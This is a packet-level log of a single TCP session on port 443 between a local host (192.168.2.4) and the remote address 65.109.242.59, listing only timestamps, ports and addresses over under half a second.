May 25, 2024 21:30:02.691708088 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.691780090 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.691790104 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.691853046 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.691885948 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.691896915 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.698987961 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.699033022 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.699064970 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.699069977 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.699089050 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.699107885 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.704292059 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.704334974 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.704363108 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.704366922 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.704395056 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.704411983 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.709671974 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.709712982 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.709754944 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.709759951 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.709788084 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.709800005 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.714587927 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.714647055 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.714677095 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.714719057 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.714752913 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.714766026 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.719008923 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.719063997 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.719091892 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.719095945 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.719121933 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.719134092 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.723155975 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.723197937 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.723229885 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.723234892 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.723263979 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.723273993 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.727086067 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.727128029 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.727165937 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.727196932 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.727236032 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.727251053 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.730524063 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.730566025 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.730602980 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.730607033 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.730635881 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.730647087 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.733943939 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.733984947 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.734015942 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.734019995 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.734046936 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.734057903 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.737076998 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.737119913 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.737159014 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.737164021 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.737194061 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.737205982 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.740803003 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.740869045 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.740914106 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.740938902 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.740974903 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.740983009 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.742954969 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.743002892 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.743038893 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.743043900 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.743069887 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.743088007 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.746823072 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.746843100 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.746922016 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.746922016 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.746929884 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.747236967 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.749908924 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.749954939 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.750001907 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.750008106 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.750047922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.750047922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.763279915 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.763325930 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.763514042 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.763521910 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.763591051 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.768873930 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.768930912 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.768968105 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.768973112 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.769006968 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.769033909 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.770817995 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.770862103 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.770931959 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.770931959 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.770937920 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.771260023 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.773744106 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.773787975 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.773861885 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.773866892 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.773900986 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.777445078 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.777489901 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.777549028 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.777549028 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.777554035 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.777596951 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.780621052 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.780667067 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.780731916 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.780731916 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.780736923 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.780790091 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.784059048 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.784107924 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.784176111 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.784194946 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.784224987 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.784246922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.786722898 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.786767006 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.786804914 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.786809921 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.786850929 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.786850929 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.789014101 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.789069891 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.789110899 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.789114952 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.789153099 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.789153099 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.793931007 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.793975115 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.794033051 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.794037104 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.794066906 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.794066906 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.794851065 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.794895887 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.794965982 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.794965982 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.794971943 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.795044899 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.797931910 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.797975063 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.798060894 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.798060894 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.798067093 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.798245907 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.800194979 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.800241947 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.800302029 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.800302029 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.800307989 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.800452948 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.804099083 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.804143906 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.804219007 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.804219007 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.804224968 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.804439068 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.805257082 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.805299044 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.805402040 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.805402040 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.805407047 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.805928946 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.807774067 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.807816982 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.807889938 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.807889938 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.807894945 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.807929039 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.810570955 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.810616970 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.810698032 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.810698032 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.810703039 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.810758114 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.813088894 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.813132048 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.813177109 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.813182116 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.813220978 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.813220978 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.818701029 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.818744898 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.818814039 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.818818092 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.818867922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.818867922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.819441080 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.819485903 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.819550037 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.819550037 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.819555044 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.819679976 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.821820021 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.821863890 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.821928024 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.821928024 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.821933985 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.822483063 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.826946974 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.826991081 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.827035904 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.827039957 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.827073097 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.827073097 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.828639030 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.828687906 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.828752041 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.828752041 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.828758001 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.828928947 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.831907034 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.831964016 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.831995010 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.831999063 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.832043886 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.832043886 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.841312885 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.841356993 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.841415882 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.841419935 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.841433048 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.841511011 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.881973028 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.882052898 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.882103920 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.882103920 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.882108927 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.882142067 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.883158922 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.884388924 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.884443045 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.884486914 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.884491920 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.884533882 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.884704113 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.886075020 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.886122942 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.886167049 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.886167049 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.886172056 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.886709929 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.888323069 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.888369083 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.888422012 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.888427019 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.888453960 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.888664007 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.893440962 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.893493891 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.893532038 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.893536091 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.893577099 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.893577099 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.915478945 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.915524960 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.915572882 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.915572882 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.915577888 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.915676117 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.925270081 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.925313950 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.925364017 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.925369024 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.925407887 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.925407887 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.932126999 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.932169914 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.932228088 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.932228088 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.932234049 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.932288885 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.980258942 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.980374098 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.980421066 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.980421066 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.980443954 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.980500937 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.980566025 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.982682943 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.982728004 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.982786894 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.982786894 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.982793093 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.982831001 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.984421015 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.984467983 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.984550953 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.984550953 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.984555960 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.984632015 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.987101078 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.987143993 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.987193108 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.987198114 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.987236977 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.987236977 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.990925074 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.990967989 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.991034031 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.991039038 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.991156101 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.008596897 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.008652925 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.008706093 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.008711100 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.008759975 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.008759975 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.019160032 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.019206047 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.019279957 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.019279957 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.019284964 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.019725084 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.025360107 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.025405884 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.025475025 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.025475025 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.025480986 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.026084900 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.071927071 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.071990013 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.072032928 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.072036982 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.072052002 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.072125912 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.074429035 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.074500084 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.074506998 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.074531078 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:03.074574947 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.074574947 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:03.078533888 CEST	443	49786	65.109.242.59	192.168.2.4
